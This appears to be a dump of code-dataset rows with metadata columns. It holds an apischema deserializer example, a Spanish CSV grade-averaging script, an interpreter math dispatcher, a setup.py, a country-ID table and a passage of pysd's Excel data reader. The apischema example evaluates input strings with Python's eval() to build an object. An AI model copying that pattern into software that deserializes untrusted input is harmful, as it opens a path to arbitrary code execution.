"$schema": "http://json-schema.org/draft/2019-09/schema#",
"type": ["string", "integer"],
}
assert deserialize(Expression, 0) == deserialize(Expression, "1 - 1") == Expression(0)
| from dataclasses import dataclass
from apischema import deserialize, deserializer
from apischema.json_schema import deserialization_schema
@dataclass
class Expression:
value: int
@deserializer
def evaluate_expression(expr: str) -> Expression:
return Expression(int(eval(expr)))
# Could be shorten into deserializer(Expression), because class is callable too
@deserializer
def expression_from_value(value: int) -> Expression:
return Expression(value)
assert deserialization_schema(Expression) == {
"$schema": "http://json-schema.org/draft/2019-09/schema#",
"type": ["string", "integer"],
}
assert deserialize(Expression, 0) == deserialize(Expression, "1 - 1") == Expression(0)
| en | 0.834069 | # Could be shorten into deserializer(Expression), because class is callable too #", | 3.194712 | 3 |
ficheros/CSV/prueba csv (lm)/alumnos.py | txtbits/daw-python | 0 | 9166 | <filename>ficheros/CSV/prueba csv (lm)/alumnos.py<gh_stars>0
# -*- coding: utf-8 -*-
'''
Created on 02/12/2011
@author: chra
'''
import csv
from operator import itemgetter
# ----- Función media de la notas de los alumnos ----------
def media(alumno):
#devuelve la nota media a partir de un diccionario con datos de un alumno
nota1 = int(alumno['Nota1'])
nota2 = int(alumno.get('Nota2'))
nota3 = int(alumno.get('Nota3'))
return (nota1+nota2+nota3) / 3.
# ----------------------------------------------------------
fin = open('alumnos.csv')
lector = csv.DictReader(fin, delimiter=",") # si no se pone delimiter, coge la coma por defecto // devuelve diccionario
# lector = csv.reader(fin, delimiter=",") <-- Devuelve lista
alumnos = []
for linea in lector:
alumnos.append((linea['Alumno'], media(linea)))
# -------- Ordenar por nombre de alumno -----------
alumnos.sort()
print 'Orden por nombre de alumno'
for al in alumnos:
print "%-10s %6.2f" % al #10 espacios entre cadena (nombre - nota media) y permite 6 digitos, 2 de ellos decimales.
# --------------------------------------------------
# --------- Ordenar por nota -----------------------
print '\nOrden por nota'
alumnos.sort(key=itemgetter(1),reverse=True)
for al in alumnos:
print "%-10s %6.2f" % al
#---------------------------------------------------
# Crea un fichero 'lista_ordenada_notas.csv' y escribe la lista ordenada por notas
fw = open('lista_ordenada_notas.csv', 'w')
csvwriter = csv.writer(fw)
for al in alumnos:
csvwriter.writerow(al)
fw.close() | <filename>ficheros/CSV/prueba csv (lm)/alumnos.py<gh_stars>0
# -*- coding: utf-8 -*-
'''
Created on 02/12/2011
@author: chra
'''
import csv
from operator import itemgetter
# ----- Función media de la notas de los alumnos ----------
def media(alumno):
#devuelve la nota media a partir de un diccionario con datos de un alumno
nota1 = int(alumno['Nota1'])
nota2 = int(alumno.get('Nota2'))
nota3 = int(alumno.get('Nota3'))
return (nota1+nota2+nota3) / 3.
# ----------------------------------------------------------
fin = open('alumnos.csv')
lector = csv.DictReader(fin, delimiter=",") # si no se pone delimiter, coge la coma por defecto // devuelve diccionario
# lector = csv.reader(fin, delimiter=",") <-- Devuelve lista
alumnos = []
for linea in lector:
alumnos.append((linea['Alumno'], media(linea)))
# -------- Ordenar por nombre de alumno -----------
alumnos.sort()
print 'Orden por nombre de alumno'
for al in alumnos:
print "%-10s %6.2f" % al #10 espacios entre cadena (nombre - nota media) y permite 6 digitos, 2 de ellos decimales.
# --------------------------------------------------
# --------- Ordenar por nota -----------------------
print '\nOrden por nota'
alumnos.sort(key=itemgetter(1),reverse=True)
for al in alumnos:
print "%-10s %6.2f" % al
#---------------------------------------------------
# Crea un fichero 'lista_ordenada_notas.csv' y escribe la lista ordenada por notas
fw = open('lista_ordenada_notas.csv', 'w')
csvwriter = csv.writer(fw)
for al in alumnos:
csvwriter.writerow(al)
fw.close() | es | 0.62407 | # -*- coding: utf-8 -*- Created on 02/12/2011 @author: chra # ----- Función media de la notas de los alumnos ---------- #devuelve la nota media a partir de un diccionario con datos de un alumno # ---------------------------------------------------------- # si no se pone delimiter, coge la coma por defecto // devuelve diccionario # lector = csv.reader(fin, delimiter=",") <-- Devuelve lista # -------- Ordenar por nombre de alumno ----------- #10 espacios entre cadena (nombre - nota media) y permite 6 digitos, 2 de ellos decimales. # -------------------------------------------------- # --------- Ordenar por nota ----------------------- #--------------------------------------------------- # Crea un fichero 'lista_ordenada_notas.csv' y escribe la lista ordenada por notas | 3.481498 | 3 |
src/interpreter/functions/math/math.py | incrementals/b-star | 2 | 9167 | <reponame>incrementals/b-star
from src.interpreter.functions.math.add import add
from src.interpreter.functions.math.div import div
from src.interpreter.functions.math.mod import mod
from src.interpreter.functions.math.mul import mul
from src.interpreter.functions.math.pow import pow_func
from src.interpreter.functions.math.sub import sub
def math_func(number, operator: str, by):
operator = operator.strip()
if operator == "+":
return add(number, by)
elif operator == "-":
return sub(number, by)
elif operator == "/":
return div(number, by)
elif operator == "*":
return mul(number, by)
elif operator == "^":
return pow_func(number, by)
elif operator == "%":
return mod(number, by)
else:
raise Exception("unknown operator: " + operator)
| from src.interpreter.functions.math.add import add
from src.interpreter.functions.math.div import div
from src.interpreter.functions.math.mod import mod
from src.interpreter.functions.math.mul import mul
from src.interpreter.functions.math.pow import pow_func
from src.interpreter.functions.math.sub import sub
def math_func(number, operator: str, by):
operator = operator.strip()
if operator == "+":
return add(number, by)
elif operator == "-":
return sub(number, by)
elif operator == "/":
return div(number, by)
elif operator == "*":
return mul(number, by)
elif operator == "^":
return pow_func(number, by)
elif operator == "%":
return mod(number, by)
else:
raise Exception("unknown operator: " + operator) | none | 1 | 3.360351 | 3 |
|
setup.py | monkey2000/pygazetteer | 1 | 9168 | <gh_stars>1-10
from setuptools import setup
setup(name='pygazetteer',
version='0.1.0',
description='Location extractor by looking up gazetteer',
url='https://github.com/monkey2000/pygazetteer',
license='MIT',
packages=['pygazetteer'],
install_requires=[
'pyahocorasick'
],
zip_safe=False,
include_package_data=True)
| from setuptools import setup
setup(name='pygazetteer',
version='0.1.0',
description='Location extractor by looking up gazetteer',
url='https://github.com/monkey2000/pygazetteer',
license='MIT',
packages=['pygazetteer'],
install_requires=[
'pyahocorasick'
],
zip_safe=False,
include_package_data=True) | none | 1 | 1.273243 | 1 |
|
iqoptionapi/country_id.py | mustx1/MYIQ | 3 | 9169 | <gh_stars>1-10
ID = {"Worldwide":0,
"AF": 1,
"AL": 2,
"DZ": 3,
"AD": 5,
"AO": 6,
"AI": 7,
"AG": 9,
"AR": 10,
"AM": 11,
"AW": 12,
"AT": 14,
"AZ": 15,
"BS": 16,
"BH": 17,
"BD": 18,
"BB": 19,
"BY": 20,
"BZ": 22,
"BJ": 23,
"BM": 24,
"BO": 26,
"BA": 27,
"BW": 28,
"BV": 29,
"BR": 30,
"BN": 31,
"BG": 32,
"BF": 33,
"BI": 34,
"KH": 35,
"CM": 36,
"CV": 38,
"KY": 39,
"TD": 41,
"CL": 42,
"CN": 43,
"CC": 45,
"CO": 46,
"KM": 47,
"CG": 48,
"CK": 49,
"CR": 50,
"CI": 51,
"HR": 52,
"CU": 53,
"CY": 54,
"CZ": 55,
"DK": 56,
"DJ": 57,
"DM": 58,
"DO": 59,
"TL": 60,
"EC": 61,
"EG": 62,
"SV": 63,
"EE": 66,
"ET": 67,
"FO": 69,
"FJ": 70,
"FI": 71,
"FR": 72,
"GF": 73,
"PF": 74,
"GA": 75,
"GM": 76,
"GE": 77,
"DE": 78,
"GH": 79,
"GR": 81,
"GD": 83,
"GP": 84,
"GT": 86,
"GN": 87,
"GY": 88,
"HT": 89,
"HN": 90,
"HK": 91,
"HU": 92,
"IS": 93,
"ID": 94,
"IQ": 95,
"IE": 96,
"IT": 97,
"JM": 98,
"JO": 100,
"KZ": 101,
"KE": 102,
"KI": 103,
"KW": 104,
"KG": 105,
"LA": 106,
"LV": 107,
"LB": 108,
"LS": 109,
"LR": 110,
"LY": 111,
"LT": 113,
"LU": 114,
"MO": 115,
"MK": 116,
"MG": 117,
"MW": 118,
"MY": 119,
"MV": 120,
"ML": 121,
"MT": 122,
"MQ": 124,
"MR": 125,
"MU": 126,
"MX": 128,
"FM": 129,
"MD": 130,
"MC": 131,
"MN": 132,
"MA": 134,
"MZ": 135,
"MM": 136,
"NA": 137,
"NP": 139,
"NL": 140,
"AN": 141,
"NC": 142,
"NZ": 143,
"NI": 144,
"NE": 145,
"NG": 146,
"NO": 149,
"OM": 150,
"PK": 151,
"PW": 152,
"PA": 153,
"PG": 154,
"PY": 155,
"PE": 156,
"PH": 157,
"PL": 159,
"PT": 160,
"QA": 162,
"RE": 163,
"RO": 164,
"RW": 166,
"KN": 167,
"LC": 168,
"SA": 171,
"SN": 172,
"SC": 173,
"SG": 175,
"SK": 176,
"SI": 177,
"SO": 179,
"ZA": 180,
"KR": 181,
"ES": 182,
"LK": 183,
"SH": 184,
"SR": 186,
"SZ": 187,
"SE": 188,
"CH": 189,
"TW": 191,
"TJ": 192,
"TZ": 193,
"TH": 194,
"TG": 195,
"TT": 198,
"TN": 199,
"TR": 200,
"TM": 201,
"UG": 203,
"UA": 204,
"AE": 205,
"GB": 206,
"UY": 207,
"UZ": 208,
"VE": 211,
"VN": 212,
"VG": 213,
"YE": 216,
"ZM": 218,
"ZW": 219,
"RS": 220,
"ME": 221,
"IN": 225,
"TC": 234,
"CD": 235,
"GG": 236,
"IM": 237,
"JE": 239,
"CW": 246, }
| ID = {"Worldwide":0,
"AF": 1,
"AL": 2,
"DZ": 3,
"AD": 5,
"AO": 6,
"AI": 7,
"AG": 9,
"AR": 10,
"AM": 11,
"AW": 12,
"AT": 14,
"AZ": 15,
"BS": 16,
"BH": 17,
"BD": 18,
"BB": 19,
"BY": 20,
"BZ": 22,
"BJ": 23,
"BM": 24,
"BO": 26,
"BA": 27,
"BW": 28,
"BV": 29,
"BR": 30,
"BN": 31,
"BG": 32,
"BF": 33,
"BI": 34,
"KH": 35,
"CM": 36,
"CV": 38,
"KY": 39,
"TD": 41,
"CL": 42,
"CN": 43,
"CC": 45,
"CO": 46,
"KM": 47,
"CG": 48,
"CK": 49,
"CR": 50,
"CI": 51,
"HR": 52,
"CU": 53,
"CY": 54,
"CZ": 55,
"DK": 56,
"DJ": 57,
"DM": 58,
"DO": 59,
"TL": 60,
"EC": 61,
"EG": 62,
"SV": 63,
"EE": 66,
"ET": 67,
"FO": 69,
"FJ": 70,
"FI": 71,
"FR": 72,
"GF": 73,
"PF": 74,
"GA": 75,
"GM": 76,
"GE": 77,
"DE": 78,
"GH": 79,
"GR": 81,
"GD": 83,
"GP": 84,
"GT": 86,
"GN": 87,
"GY": 88,
"HT": 89,
"HN": 90,
"HK": 91,
"HU": 92,
"IS": 93,
"ID": 94,
"IQ": 95,
"IE": 96,
"IT": 97,
"JM": 98,
"JO": 100,
"KZ": 101,
"KE": 102,
"KI": 103,
"KW": 104,
"KG": 105,
"LA": 106,
"LV": 107,
"LB": 108,
"LS": 109,
"LR": 110,
"LY": 111,
"LT": 113,
"LU": 114,
"MO": 115,
"MK": 116,
"MG": 117,
"MW": 118,
"MY": 119,
"MV": 120,
"ML": 121,
"MT": 122,
"MQ": 124,
"MR": 125,
"MU": 126,
"MX": 128,
"FM": 129,
"MD": 130,
"MC": 131,
"MN": 132,
"MA": 134,
"MZ": 135,
"MM": 136,
"NA": 137,
"NP": 139,
"NL": 140,
"AN": 141,
"NC": 142,
"NZ": 143,
"NI": 144,
"NE": 145,
"NG": 146,
"NO": 149,
"OM": 150,
"PK": 151,
"PW": 152,
"PA": 153,
"PG": 154,
"PY": 155,
"PE": 156,
"PH": 157,
"PL": 159,
"PT": 160,
"QA": 162,
"RE": 163,
"RO": 164,
"RW": 166,
"KN": 167,
"LC": 168,
"SA": 171,
"SN": 172,
"SC": 173,
"SG": 175,
"SK": 176,
"SI": 177,
"SO": 179,
"ZA": 180,
"KR": 181,
"ES": 182,
"LK": 183,
"SH": 184,
"SR": 186,
"SZ": 187,
"SE": 188,
"CH": 189,
"TW": 191,
"TJ": 192,
"TZ": 193,
"TH": 194,
"TG": 195,
"TT": 198,
"TN": 199,
"TR": 200,
"TM": 201,
"UG": 203,
"UA": 204,
"AE": 205,
"GB": 206,
"UY": 207,
"UZ": 208,
"VE": 211,
"VN": 212,
"VG": 213,
"YE": 216,
"ZM": 218,
"ZW": 219,
"RS": 220,
"ME": 221,
"IN": 225,
"TC": 234,
"CD": 235,
"GG": 236,
"IM": 237,
"JE": 239,
"CW": 246, } | none | 1 | 1.26624 | 1 |
|
pysd/py_backend/external.py | rogersamso/pysd_dev | 0 | 9170 | """
These classes are a collection of the needed tools to read external data.
The External type objects created by these classes are initialized before
the Stateful objects by functions.Model.initialize.
"""
import re
import os
import warnings
import pandas as pd # TODO move to openpyxl
import numpy as np
import xarray as xr
from openpyxl import load_workbook
from . import utils
class Excels():
"""
Class to save the read Excel files and thus avoid double reading
"""
_Excels, _Excels_opyxl = {}, {}
@classmethod
def read(cls, file_name, sheet_name):
"""
Read the Excel file or return the previously read one
"""
if file_name + sheet_name in cls._Excels:
return cls._Excels[file_name + sheet_name]
else:
excel = np.array([
pd.to_numeric(ex, errors='coerce')
for ex in
pd.read_excel(file_name, sheet_name, header=None).values
])
cls._Excels[file_name + sheet_name] = excel
return excel
@classmethod
def read_opyxl(cls, file_name):
"""
Read the Excel file using OpenPyXL or return the previously read one
"""
if file_name in cls._Excels_opyxl:
return cls._Excels_opyxl[file_name]
else:
excel = load_workbook(file_name, read_only=True, data_only=True)
cls._Excels_opyxl[file_name] = excel
return excel
@classmethod
def clean(cls):
"""
Clean the dictionary of read files
"""
cls._Excels, cls._Excels_opyxl = {}, {}
class External(object):
"""
Main class of external objects
Attributes
----------
py_name: str
The python name of the object
missing: str ("warning", "error", "ignore", "keep")
What to do with missing values. If "warning" (default)
shows a warning message and interpolates the values.
If "raise" raises an error. If "ignore" interpolates
the values without showing anything. If "keep" it will keep
the missing values, this option may cause the integration to
fail, but it may be used to check the quality of the data.
file: str
File name from which the data is read.
sheet: str
Sheet name from which the data is read.
"""
missing = "warning"
def __init__(self, py_name):
self.py_name = py_name
self.file = None
self.sheet = None
def __str__(self):
return self.py_name
def _get_data_from_file(self, rows, cols):
"""
Function to read data from excel file using rows and columns
Parameters
----------
rows: list of len 2
first row and last row+1 to be read, starting from 0
cols: list of len 2
first col and last col+1 to be read, starting from 0
Returns
-------
data: pandas.DataFrame, pandas.Series or float
depending on the shape of the requested data
"""
# TODO move to openpyxl to avoid pandas dependency in this file.
ext = os.path.splitext(self.file)[1].lower()
if ext in ['.xls', '.xlsx']:
# read data
data = Excels.read(
self.file,
self.sheet)[rows[0]:rows[1], cols[0]:cols[1]].copy()
shape = data.shape
# if it is a single row remove its dimension
if shape[1] == 1:
data = data[:, 0]
if shape[0] == 1:
data = data[0]
return data
raise NotImplementedError(self.py_name + "\n"
+ "The files with extension "
+ ext + " are not implemented")
def _get_data_from_file_opyxl(self, cellname):
"""
Function to read data from excel file using cell range name
Parameters
----------
cellname: str
the cell range name
Returns
-------
data: numpy.ndarray or float
depending on the shape of the requested data
"""
# read data
excel = Excels.read_opyxl(self.file)
try:
# Get the local id of the sheet
# needed for searching in locals names
# need to lower the sheetnames as Vensim has no case sensitivity
sheetId = [sheetname_wb.lower() for sheetname_wb
in excel.sheetnames].index(self.sheet.lower())
except ValueError:
# Error if it is not able to get the localSheetId
raise ValueError(self.py_name + "\n"
+ "The sheet doesn't exist...\n"
+ self._file_sheet)
try:
# Search for local and global names
cellrange = excel.defined_names.get(cellname, sheetId)\
or excel.defined_names.get(cellname)
coordinates = cellrange.destinations
for sheet, cells in coordinates:
if sheet.lower() == self.sheet.lower():
values = excel[sheet][cells]
try:
return np.array(
[[i.value if not isinstance(i.value, str)
else np.nan for i in j] for j in values],
dtype=float)
except TypeError:
return float(values.value)
raise AttributeError
except (KeyError, AttributeError):
# key error if the cellrange doesn't exist in the file or sheet
raise AttributeError(
self.py_name + "\n"
+ "The cell range name:\t {}\n".format(cellname)
+ "Doesn't exist in:\n" + self._file_sheet
)
def _get_series_data(self, series_across, series_row_or_col, cell, size):
"""
Function thar reads series and data from excel file for
DATA and LOOKUPS.
Parameters
----------
series_across: "row", "column" or "name"
The way to read series file.
series_row_or_col: int or str
If series_across is "row" the row number where the series data is.
If series_across is "column" the column name where
the series data is.
If series_across is "name" the cell range name where
the series data is.
cell:
If series_across is not "name, the top left cell where
the data table starts.
Else the name of the cell range where the data is.
size:
The size of the 2nd dimension of the data.
Returns
-------
series, data: ndarray (1D), ndarray(1D/2D)
The values of the series and data.
"""
if series_across == "row":
# Horizontal data (dimension values in a row)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series = self._get_data_from_file(
rows=[int(series_row_or_col)-1, int(series_row_or_col)],
cols=[first_col, None])
# read data
data = self._get_data_from_file(
rows=[first_row, first_row + size],
cols=[first_col, None]).transpose()
elif series_across == "column":
# Vertical data (dimension values in a column)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series_col = self._col_to_num(series_row_or_col)
series = self._get_data_from_file(
rows=[first_row, None],
cols=[series_col, series_col+1])
# read data
data = self._get_data_from_file(
rows=[first_row, None],
cols=[first_col, first_col + size])
else:
# get series data
series = self._get_data_from_file_opyxl(series_row_or_col)
if isinstance(series, float):
series = np.array([[series]])
series_shape = series.shape
if series_shape[0] == 1:
# horizontal definition of lookup/time dimension
series = series[0]
transpose = True
elif series_shape[1] == 1:
# vertical definition of lookup/time dimension
series = series[:, 0]
transpose = False
else:
# Error if the lookup/time dimension is 2D
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\tDimentime_missingsion name:"
+ "\t{}\n".format(series_row_or_col)
+ " is a table and not a vector"
)
# get data
data = self._get_data_from_file_opyxl(cell)
if isinstance(data, float):
data = np.array([[data]])
if transpose:
# transpose for horizontal definition of dimension
data = data.transpose()
if data.shape[0] != len(series):
raise ValueError(
self.py_name + "\n"
+ "Dimension and data given in:\n"
+ self._file_sheet
+ "\tDimension name:\t{}\n".format(series_row_or_col)
+ "\tData name:\t{}\n".format(cell)
+ " don't have the same length in the 1st dimension"
)
if data.shape[1] != size:
# Given coordinates length is different than
# the lentgh of 2nd dimension
raise ValueError(
self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same size as the given coordinates"
)
if data.shape[1] == 1:
# remove second dimension of data if its shape is (N, 1)
data = data[:, 0]
return series, data
def _resolve_file(self, root=None, possible_ext=None):
possible_ext = possible_ext or\
['', '.xls', '.xlsx', '.odt', '.txt', '.tab']
if self.file[0] == '?':
self.file = os.path.join(root, self.file[1:])
if not os.path.isfile(self.file):
for ext in possible_ext:
if os.path.isfile(self.file + ext):
self.file = self.file + ext
return
# raise FileNotFoundError(self.file)
# python2 compatibility
raise IOError("File Not Found: " + self.file)
else:
return
def _initialize_data(self, element_type):
"""
Initialize one element of DATA or LOOKUPS
Parameters
----------
element_type: str
"lookup" for LOOKUPS, "data" for data.
Returns
-------
data: xarray.DataArray
Dataarray with the time or interpolation dimension
as first dimension.
"""
self._resolve_file(root=self.root)
series_across = self._series_selector(self.x_row_or_col, self.cell)
size = utils.compute_shape(self.coords, reshape_len=1,
py_name=self.py_name)[0]
series, data = self._get_series_data(
series_across=series_across,
series_row_or_col=self.x_row_or_col,
cell=self.cell, size=size
)
# remove nan or missing values from dimension
if series_across != "name":
# Remove last nans only if the method is to read by row or col
i = 0
try:
while np.isnan(series[i-1]):
i -= 1
except IndexError:
# series has len 0
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " has length 0"
)
if i != 0:
series = series[:i]
data = data[:i]
# warning/error if missing data in the series
if any(np.isnan(series)) and self.missing != "keep":
valid_values = ~np.isnan(series)
series = series[valid_values]
data = data[valid_values]
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " the corresponding data value(s) to the "
+ "missing/non-valid value(s) will be ignored\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
)
# Check if the lookup/time dimension is strictly monotonous
if np.any(np.diff(series) <= 0) and self.missing != "keep":
raise ValueError(self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " is not strictly monotonous")
# Check for missing values in data
if np.any(np.isnan(data)) and self.missing != "keep":
if series_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
# Fill missing values with the chosen interpolation method
# what Vensim does during running for DATA
warnings.warn(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
+ " the corresponding value will be filled "
+ "with the interpolation method of the object.\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# fill values
self._fill_missing(series, data)
reshape_dims = tuple([len(series)] + utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
if element_type == "lookup":
dim_name = "lookup_dim"
else:
dim_name = "time"
data = xr.DataArray(
data=data,
coords={dim_name: series, **self.coords},
dims=[dim_name] + list(self.coords)
)
return data
def _fill_missing(self, series, data):
"""
Fills missing values in excel read data. Mutates the values in data.
Parameters
----------
series:
the time series without missing values
data:
the data with missing values
Returns
-------
None
"""
# if data is 2dims we need to interpolate
datanan = np.isnan(data)
if len(data.shape) == 1:
data[datanan] = self._interpolate_missing(
series[datanan],
series[~datanan],
data[~datanan])
else:
for i, nanlist in enumerate(list(datanan.transpose())):
data[nanlist, i] = self._interpolate_missing(
series[nanlist],
series[~nanlist],
data[~nanlist][:, i])
def _interpolate_missing(self, x, xr, yr):
"""
Interpolates a list of missing values from _fill_missing
Parameters
----------
x:
list of missing values interpolate
xr:
non-missing x values
yr:
non-missing y values
Returns
-------
y:
Result after interpolating x with self.interp method
"""
y = np.empty_like(x, dtype=float)
for i, value in enumerate(x):
if self.interp == "raw":
y[i] = np.nan
elif value >= xr[-1]:
y[i] = yr[-1]
elif value <= xr[0]:
y[i] = yr[0]
elif self.interp == 'look forward':
y[i] = yr[xr >= value][0]
elif self.interp == 'hold backward':
y[i] = yr[xr <= value][-1]
else:
y[i] = np.interp(value, xr, yr)
return y
@property
def _file_sheet(self):
"""
Returns file and sheet name in a string
"""
return "\tFile name:\t{}\n".format(self.file)\
+ "\tSheet name:\t{}\n".format(self.sheet)
@staticmethod
def _col_to_num(col):
"""
Transforms the column name to int
Parameters
----------
col: str
Column name
Returns
-------
int
Column number
"""
if len(col) == 1:
return ord(col.upper()) - ord('A')
elif len(col) == 2:
left = ord(col[0].upper()) - ord('A') + 1
right = ord(col[1].upper()) - ord('A')
return left * (ord('Z')-ord('A')+1) + right
else:
left = ord(col[0].upper()) - ord('A') + 1
center = ord(col[1].upper()) - ord('A') + 1
right = ord(col[2].upper()) - ord('A')
return left * ((ord('Z')-ord('A')+1)**2)\
+ center * (ord('Z')-ord('A')+1)\
+ right
def _split_excel_cell(self, cell):
"""
Splits a cell value given in a string.
Returns None for non-valid cell formats.
Parameters
----------
cell: str
Cell like string, such as "A1", "b16", "AC19"...
If it is not a cell like string will return None.
Returns
-------
row number, column number: int, int
If the cell input is valid. Both numbers are given in Python
enumeration, i.e., first row and first column are 0.
"""
split = re.findall(r'\d+|\D+', cell)
try:
# check that we only have two values [column, row]
assert len(split) == 2
# check that the column name has no special characters
assert not re.compile('[^a-zA-Z]+').search(split[0])
# check that row number is not 0
assert int(split[1]) != 0
# the column name has as maximum 3 letters
assert len(split[0]) <= 3
return int(split[1])-1, self._col_to_num(split[0])
except AssertionError:
return
@staticmethod
def _reshape(data, dims):
"""
Reshapes an pandas.DataFrame, pandas.Series, xarray.DataArray
or np.ndarray in the given dimensions.
Parameters
----------
data: xarray.DataArray/numpy.ndarray
Data to be reshaped
dims: tuple
The dimensions to reshape.
Returns
-------
numpy.ndarray
reshaped array
"""
try:
data = data.values
except AttributeError:
pass
return data.reshape(dims)
def _series_selector(self, x_row_or_col, cell):
"""
Selects if a series data (DATA/LOOKUPS), should be read by columns,
rows or cellrange name.
Based on the input format of x_row_or_col and cell.
The format of the 2 variables must be consistent.
Parameters
----------
x_row_or_col: str
String of a number if series is given in a row, letter if series is
given in a column or name if the series is given by cellrange name.
cell: str
Cell identificator, such as "A1", or name if the data is given
by cellrange name.
Returns
-------
series_across: str
"row" if series is given in a row
"column" if series is given in a column
"name" if series and data are given by range name
"""
try:
# if x_row_or_col is numeric the series must be a row
int(x_row_or_col)
return "row"
except ValueError:
if self._split_excel_cell(cell):
# if the cell can be splitted means that the format is
# "A1" like then the series must be a column
return "column"
else:
return "name"
class ExtData(External):
"""
Class for Vensim GET XLS DATA/GET DIRECT DATA
"""
def __init__(self, file_name, sheet, time_row_or_col, cell,
interp, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.time_row_or_cols = [time_row_or_col]
self.cells = [cell]
self.coordss = [coords]
self.root = root
self.interp = interp
# check if the interpolation method is valid
if not interp:
self.interp = "interpolate"
if self.interp not in ["interpolate", "raw",
"look forward", "hold backward"]:
raise ValueError(self.py_name + "\n"
+ " The interpolation method (interp) must be "
+ "'raw', 'interpolate', "
+ "'look forward' or 'hold backward")
def add(self, file_name, sheet, time_row_or_col, cell,
interp, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.time_row_or_cols.append(time_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if not interp:
interp = "interpolate"
if interp != self.interp:
raise ValueError(self.py_name + "\n"
+ "Error matching interpolation method with "
+ "previously defined one")
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.time_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("data"))
self.data = utils.xrmerge(data)
def __call__(self, time):
if time in self.data['time'].values:
outdata = self.data.sel(time=time)
elif self.interp == "raw":
return np.nan
elif time > self.data['time'].values[-1]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the time")
outdata = self.data[-1]
elif time < self.data['time'].values[0]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the time")
outdata = self.data[0]
elif self.interp == "interpolate":
outdata = self.data.interp(time=time)
elif self.interp == 'look forward':
outdata = self.data.sel(time=time, method="backfill")
elif self.interp == 'hold backward':
outdata = self.data.sel(time=time, method="pad")
if self.coordss[0]:
# Remove time coord from the DataArray
return outdata.reset_coords('time', drop=True)
else:
# if data has no-coords return a float
return float(outdata)
class ExtLookup(External):
"""
Class for Vensim GET XLS LOOKUPS/GET DIRECT LOOKUPS
"""
def __init__(self, file_name, sheet, x_row_or_col, cell,
coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.x_row_or_cols = [x_row_or_col]
self.cells = [cell]
self.root = root
self.coordss = [coords]
self.interp = "interpolate"
def add(self, file_name, sheet, x_row_or_col, cell, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.x_row_or_cols.append(x_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.x_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("lookup"))
self.data = utils.xrmerge(data)
def __call__(self, x):
return self._call(self.data, x)
def _call(self, data, x):
if isinstance(x, xr.DataArray):
if not x.dims:
# shape 0 xarrays
return self._call(data, float(x))
if np.all(x > data['lookup_dim'].values[-1]):
outdata, _ = xr.broadcast(data[-1], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif np.all(x < data['lookup_dim'].values[0]):
outdata, _ = xr.broadcast(data[0], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
data, _ = xr.broadcast(data, x)
outdata = data[0].copy()
for a in utils.xrsplit(x):
outdata.loc[a.coords] = self._call(data.loc[a.coords],
float(a))
# the output will be always an xarray
return outdata.reset_coords('lookup_dim', drop=True)
else:
if x in data['lookup_dim'].values:
outdata = data.sel(lookup_dim=x)
elif x > data['lookup_dim'].values[-1]:
outdata = data[-1]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif x < data['lookup_dim'].values[0]:
outdata = data[0]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
outdata = data.interp(lookup_dim=x)
# the output could be a float or an xarray
if self.coordss[0]:
# Remove lookup dimension coord from the DataArray
return outdata.reset_coords('lookup_dim', drop=True)
else:
# if lookup has no-coords return a float
return float(outdata)
class ExtConstant(External):
"""
Class for Vensim GET XLS CONSTANTS/GET DIRECT CONSTANTS
"""
def __init__(self, file_name, sheet, cell, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.transposes = [cell[-1] == '*']
self.cells = [cell.strip('*')]
self.root = root
self.coordss = [coords]
def add(self, file_name, sheet, cell, coords):
"""
